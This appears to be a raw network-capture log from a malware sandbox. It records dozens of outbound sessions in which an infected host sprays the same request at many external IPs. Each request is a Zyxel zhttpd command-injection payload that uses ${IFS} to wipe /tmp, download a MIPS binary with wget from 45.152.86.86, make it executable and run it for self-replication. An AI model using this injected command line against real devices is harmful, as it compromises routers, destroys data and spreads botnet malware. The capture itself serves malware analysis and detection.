                              Mar 31, 2024 08:42:21.527512074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9413192.168.2.134075661.20.15.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527554989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9414192.168.2.1344906185.81.237.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527581930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9415192.168.2.1335460184.70.146.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527600050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9416192.168.2.1351382165.22.54.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527631044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9417192.168.2.135525890.202.153.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527698040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9418192.168.2.1339920147.79.131.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527725935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9419192.168.2.1337340202.138.230.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527792931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9420192.168.2.135205863.59.104.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527849913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9421192.168.2.1341246183.173.44.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527906895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9422192.168.2.135259636.22.175.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527945042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9423192.168.2.1360626171.224.169.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.527987957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9424192.168.2.1358748138.90.87.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528021097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9425192.168.2.135775495.84.160.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528063059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9426192.168.2.1333458222.65.168.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528090954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9427192.168.2.1342640106.189.95.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528137922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9428192.168.2.135306634.167.219.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528182030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9429192.168.2.1359238126.209.153.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528234005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9430192.168.2.134857238.74.63.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528273106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9431192.168.2.1358680143.161.149.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528295994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9432192.168.2.134775666.93.86.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528347969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9433192.168.2.1345024174.213.80.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528400898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9434192.168.2.1355324202.62.4.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528405905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9435192.168.2.1349034223.89.241.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528466940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9436192.168.2.135950648.6.42.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528507948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9437192.168.2.1339964101.119.241.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528527975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9438192.168.2.1349038151.206.212.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528593063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9439192.168.2.1333960103.119.128.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528618097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9440192.168.2.134510252.149.179.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528664112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9441192.168.2.134696283.127.166.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528700113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9442192.168.2.133359648.163.107.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528748989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9443192.168.2.1356918125.211.128.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528794050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9444192.168.2.1340538153.96.231.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528851032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9445192.168.2.1360748131.175.114.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528892994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9446192.168.2.1334648108.80.153.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528911114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9447192.168.2.1357026153.146.41.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.528947115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9448192.168.2.136021261.34.243.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529007912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9449192.168.2.1336198181.254.206.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529048920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9450192.168.2.1345212188.13.192.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529092073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9451192.168.2.1345780119.76.249.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529117107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9452192.168.2.1338102161.230.35.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529171944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9453192.168.2.135222850.77.119.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529216051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9454192.168.2.1340824142.183.36.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529252052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9455192.168.2.1340872144.65.105.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529304981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9456192.168.2.1359372152.194.72.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529347897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9457192.168.2.1343150143.159.106.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529385090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9458192.168.2.1339086132.55.128.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529424906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9459192.168.2.1339110201.212.6.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529488087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9460192.168.2.135543490.155.246.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529545069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9461192.168.2.1345814167.129.139.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529576063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9462192.168.2.134771697.113.170.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529625893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9463192.168.2.1336492152.188.85.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529670954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9464192.168.2.133506873.127.47.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529731989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9465192.168.2.134879437.72.5.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529763937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9466192.168.2.1348764102.102.245.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529794931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9467192.168.2.1340836203.200.215.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529860020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9468192.168.2.1347968197.197.229.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529915094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9469192.168.2.1351582158.15.36.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.529952049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9470192.168.2.1336942197.42.151.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530003071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9471192.168.2.1349458165.196.238.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530044079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9472192.168.2.135808413.166.47.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530102015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9473192.168.2.1334794143.100.30.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530152082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9474192.168.2.133658448.63.140.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530193090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9475192.168.2.1336032142.22.91.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530224085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9476192.168.2.1357858113.136.199.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530267954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9477192.168.2.135625887.130.69.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530333996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9478192.168.2.1334322148.245.84.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530364990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9479192.168.2.1357436146.88.150.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530421972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9480192.168.2.1343310192.146.83.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530476093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9481192.168.2.135428014.35.160.203443
                              TimestampBytes transferredDirectionData
